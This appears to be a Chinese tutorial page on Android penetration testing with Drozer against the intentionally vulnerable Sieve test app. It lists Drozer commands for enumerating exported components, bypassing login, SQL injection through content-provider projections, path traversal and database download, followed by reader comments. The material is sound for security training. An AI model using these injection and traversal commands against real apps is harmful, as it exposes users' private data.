AI智能摘要
你是否想过,一个看似无害的Android应用,竟可能暗藏信息泄露、SQL注入甚至远程代码执行的致命漏洞?本文带你手把手实战Drozer,从零开始挖掘App的暴露组件、绕过登录验证、读取敏感数据,直至发现SQL注入与目录遍历漏洞。无需猜测,全程真实操作演示,揭秘移动安全测试的核心逻辑与攻击路径。看完你也能独立完成一次完整的Android渗透测试。
— AI 生成的文章内容摘要
声明:本文全程采用测试app,根据相关法律法规严禁非法入侵他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动,窃取或者以其他非法方式获取个人信息。
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|


run app.package.list
run app.package.list -f sieve
run app.package.info -a 包名
run app.package.attacksurface 包名
run app.activity.info -a 包名
run app.activity.start–component 包名 组件名

run app.provider.info -a 包名
run scanner.provider.finduris -a 包名
run app.provider.query 查询到的URI
run app.provider.query URI --projection"* FROM SQLITE_MASTER WHERE type='table';--"
run app.provider.query URI --projection"* FROM 表名;--"
runscanner.provider.injection -a 包名
run scanner.provider.traversal -a 包名
run app.provider.read 遍历路径/文件路径
run app.provider.download 数据库URI 本地路径/备份文件名.db


上海市金山区 1F
这个测试app挺有意思的,回头也找个模拟器试试看。
日本 2F
SQL注入那块操作写得挺细的,跟着走了一遍,确实能读到数据。
辽宁省沈阳市 B1
@ LullabyLemon SQL注入检测结果那么多,是不是测试app故意留的漏洞?
贵州省贵阳市 3F
目录遍历那个漏洞有点吓人啊,直接能读到hosts文件。
北京市 B1
@ 马秀兰 hosts文件都能读到确实吓人,权限给得太大了。
日本 4F
新手问一下,除了夜神,别的模拟器能跑吗?🤔
广东省广州市 5F
搞了半天,最后那个数据库下载下来是啥格式的?.db文件直接能打开看?
河南省新乡市 B1
@ 绯红魔导士 数据库文件用SQLite浏览器就能打开,挺方便的。
甘肃省 6F
之前公司让做移动端安全自查,也用过drozer,配置环境有点烦人。
浙江省杭州市 7F
感觉内容提供者那块风险最大,一不留神就把用户数据漏出去了。
吉林省通化市 8F
看到SQL注入成功那段,确实有点小兴奋,哈哈。
北京市 9F
这种实战教程比光讲理论有用多了,至少知道工具咋用。
山东省菏泽市 10F
工具是好工具,就是不知道现在新版本的Android还有这么多漏洞不。
日本 11F
这个工具配置起来麻烦不?需要root权限吗?
福建省福州市 12F
感觉这些漏洞在新版Android上应该修复了不少吧?
北京市 13F
测试app在哪下载啊?官网找了半天没找到。
天津市 14F
跟着操作到SQL注入那步卡住了,报语法错误怎么回事?
广西河池市 15F
内容提供者的安全风险经常被开发者忽略。
广东省广州市 16F
之前做渗透测试也用过drozer,环境配置折腾了好久。
山东省滨州市 17F
直接绕过登录拿到个人信息那段太秀了!
浙江省杭州市 18F
模拟器用MuMu也可以,夜神有时候会卡顿。
韩国 19F
MuMu是挺顺的,我用它跑Drozer基本不卡,夜神开多了直接变幻灯片。
印度 20F
这app叫Sieve,GitHub上就有,搜drozer官方仓库就行。
重庆市 21F
SQL注入那几步看着眼熟,跟Web渗透思路差不多。
北京市 22F
环境配崩了三次才成功,Java版本和adb权限太坑了。
日本 23F
直接进文件系统那段太狠了,感觉防护形同虚设。
巴基斯坦 24F
试了下还真能绕过登录,这安全做得有点随意啊。
北京市 B1
@ Raven鸦 这种测试应用漏洞是有点多
浙江省舟山市 25F
SQL注入那里–projection后面为啥要加–?不加就报错,求解?
重庆市 26F
之前自己逆了个金融app,content provider也这么松,数据全裸。
澳大利亚 27F
数据库下下来是SQLite格式,用DB Browser打不开?得用什么工具看啊?
辽宁省本溪市 28F
目录遍历那块有点东西,hosts都能看。